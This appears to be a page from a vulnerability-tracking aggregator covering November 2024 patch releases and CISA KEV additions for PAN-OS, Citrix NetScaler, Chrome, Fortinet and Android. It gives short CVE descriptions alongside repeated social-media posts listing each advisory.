  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-2551(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:01

1 posts

A null pointer dereference vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to stop a core system service on the firewall by sending a crafted packet through the data plane that causes a denial of service (DoS) condition. Repeated attempts to trigger this condition result in the firewall entering maintenance mode.

1 repos

#search_error

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-8535
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-14T00:31:11

1 posts

Authenticated user can access unintended user capabilities in NetScaler ADC and NetScaler Gateway if the appliance must be configured as a Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) with KCDAccount configuration for Kerberos SSO to access backend resources OR the appliance must be configured as an Auth Server (AAA Vserver) with KCDAccount configuration for Kerberos SSO to access backend resour

screaminggoat@infosec.exchange at 2024-11-12T16:21:27.000Z ##

Happy #PatchTuesday from Citrix:

Please see the advisories for the prerequisites for each vulnerability.

#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity

##

CVE-2024-43093
(7.8 HIGH)

EPSS: 0.25%

updated 2024-11-13T21:31:39

3 posts

In shouldHideDocument of ExternalStorageProvider.java, there is a possible bypass of a file path filter designed to prevent access to sensitive directories due to incorrect unicode normalization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.

2 repos

https://github.com/hatvix1/CVE-2024-43093

https://github.com/HatvixSupport/CVE-2024-43093

hrbrmstr@mastodon.social at 2024-11-07T16:43:45.000Z ##

We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:

- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093

Hit up viz.greynoise.io for deets + real/useful/timely blocklists.

CVE-2024-43093 is client-side, hence no coverage.

##

cisakevtracker@mastodon.social at 2024-11-07T16:01:23.000Z ##

CVE ID: CVE-2024-43093
Vendor: Android
Product: Framework
Date Added: 2024-11-07
Vulnerability: Android Framework Privilege Escalation Vulnerability
Notes: source.android.com/docs/securi ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-07T15:35:09.000Z ##

CISA: CISA Adds Four Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-5910 (9.3 critical) Palo Alto Expedition Missing Authentication Vulnerability
  • CVE-2024-43093 (high) Android Framework Privilege Escalation Vulnerability
  • CVE-2024-51567 (10.0 critical 🥳) CyberPanel Incorrect Default Permissions Vulnerability
  • CVE-2019-16278 (9.8 critical) Nostromo nhttpd Directory Traversal Vulnerability

#cisa #cisakev #kev #vulnerability #CVE #CVE_2024_5910 #CVE_2024_43093 #CVE_2024_51567 #CVE_2019_16278 #infosec #cybersecurity

##

CVE-2024-8534
(5.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T21:30:33

1 posts

Memory safety vulnerability leading to memory corruption and Denial of Service in NetScaler ADC and Gateway if the appliance must be configured as a Gateway (VPN Vserver) with RDP Feature enabled OR the appliance must be configured as a Gateway (VPN Vserver) and RDP Proxy Server Profile is created and set to Gateway (VPN Vserver) OR the appliance must be configured as a Auth Server (AAA Vserver) w

screaminggoat@infosec.exchange at 2024-11-12T16:21:27.000Z ##

Happy #PatchTuesday from Citrix:

Please see the advisories for the prerequisites for each vulnerability.

#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity

##

CVE-2024-11116
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T18:33:06

1 posts

Inappropriate implementation in Blink in Google Chrome prior to 131.0.6778.69 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11110
(6.5 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T18:33:05

2 posts

Inappropriate implementation in Extensions in Google Chrome prior to 131.0.6778.69 allowed a remote attacker to bypass site isolation via a crafted Chrome Extension. (Chromium security severity: High)

screaminggoat@infosec.exchange at 2024-11-14T20:13:10.000Z ##

Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.

#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday

##

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11115
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-13T18:33:05

1 posts

Insufficient policy enforcement in Navigation in Google Chrome on iOS prior to 131.0.6778.69 allowed a remote attacker to perform privilege escalation via a series of UI gestures. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11111
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T18:33:05

1 posts

Inappropriate implementation in Autofill in Google Chrome prior to 131.0.6778.69 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11117
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T18:31:59

2 posts

Inappropriate implementation in FileSystem in Google Chrome prior to 131.0.6778.69 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Low)

screaminggoat@infosec.exchange at 2024-11-14T20:13:10.000Z ##

Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.

#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday

##

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-8069
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-13T18:31:59

3 posts

Limited remote code execution with privilege of a NetworkService Account access in Citrix Session Recording if the attacker is an authenticated user on the same intranet as the session recording server

screaminggoat@infosec.exchange at 2024-11-13T14:17:04.000Z ##

The second Citrix security advisory Citrix Session Recording Security Bulletin for CVE-2024-8068 and CVE-2024-8069 appears to be the same vulnerabilities mentioned in yesterday's watchTowr blog post Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown), based on the credits/acknowledgement to watchTowr, description of vulnerabilities, and the affected products. At the time of this toot, watchTowr has not updated their blog post to include the CVE IDs.

#Citrix #vulnerability #virtualappsanddesktops #cve #infosec #cybersecurity #watchtowr

##

GossiTheDog@cyberplace.social at 2024-11-12T21:22:55.000Z ##

If you present Citrix StoreFront aka Citrix StoreWeb directly to the internet and enabled session recording, you will want to drop everything and install patches for CVE-2024-8068 and CVE-2024-8069. People are already scanning for it (no signs of exploitation).

It’s a niche scenario for direct internet access.

Vendor advisory: support.citrix.com/s/article/C

Technical write up: labs.watchtowr.com/visionaries

Shodan dork: beta.shodan.io/search?query=ht

Citrix have used terms like “limited RCE” and “intranet” 🤨

##

screaminggoat@infosec.exchange at 2024-11-12T16:21:27.000Z ##

Happy #PatchTuesday from Citrix:

Please see the advisories for the prerequisites for each vulnerability.

#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity

##

CVE-2014-2120
(5.4 MEDIUM)

EPSS: 0.25%

updated 2024-11-13T18:31:52

2 posts

Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCun19025.

cisakevtracker@mastodon.social at 2024-11-12T19:01:09.000Z ##

CVE ID: CVE-2014-2120
Vendor: Cisco
Product: Adaptive Security Appliance (ASA)
Date Added: 2024-11-12
Vulnerability: Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
Notes: web.archive.org/web/2014040304 ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-33505
(5.6 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T17:01:16.850000

1 posts

A heap-based buffer overflow in Fortinet FortiAnalyzer version 7.4.0 through 7.4.2, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, FortiManager version 7.4.0 through 7.4.2, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14 allows attacker to escalation of privilege via specially crafted http requests

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2023-50176
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-13T17:01:16.850000

1 posts

A session fixation in Fortinet FortiOS version 7.4.0 through 7.4.3 and 7.2.0 through 7.2.7 and 7.0.0 through 7.0.13 allows attacker to execute unauthorized code or commands via phishing SAML authentication link.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2023-47543
(5.4 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T17:01:16.850000

1 posts

An authorization bypass through user-controlled key vulnerability [CWE-639] in Fortinet FortiPortal version 7.0.0 through 7.0.3 allows an authenticated attacker to interact with ressources of other organizations via HTTP or HTTPS requests.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-47574
(7.8 HIGH)

EPSS: 0.04%

updated 2024-11-13T12:32:16

2 posts

A authentication bypass using an alternate path or channel in Fortinet FortiClientWindows version 7.4.0, versions 7.2.4 through 7.2.0, versions 7.0.12 through 7.0.0, and 6.4.10 through 6.4.0 allows low privilege attacker to execute arbitrary code with high privilege via spoofed named pipe messages.

jbhall56@infosec.exchange at 2024-11-15T12:53:46.000Z ##

The bug is tracked as CVE-2024-47574, and it earned a 7.8 out of 10 CVSS severity rating. It affects FortiClientWindows version 7.4.0, 7.2.4 through 7.2.0, 7.0.12 through 7.0.0, and 6.4.10 through 6.4.0. Fortinet patched the hole on Tuesday. theregister.com/2024/11/14/for

##

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-11114
(8.4 HIGH)

EPSS: 0.04%

updated 2024-11-13T00:30:48

1 posts

Inappropriate implementation in Views in Google Chrome on Windows prior to 131.0.6778.69 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11113
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-13T00:30:48

1 posts

Use after free in Accessibility in Google Chrome prior to 131.0.6778.69 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11112
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-13T00:30:48

1 posts

Use after free in Media in Google Chrome on Windows prior to 131.0.6778.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-32117
(4.9 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:31:01

1 posts

An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-22] in Fortinet FortiManager version 7.4.0 through 7.4.2 and below 7.2.5, FortiAnalyzer version 7.4.0 through 7.4.2 and below 7.2.5 & FortiAnalyzer-BigData version 7.4.0 and below 7.2.7 allows a privileged attacker to read arbitrary files from the underlying system via crafted HTTP or HTTPs request

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
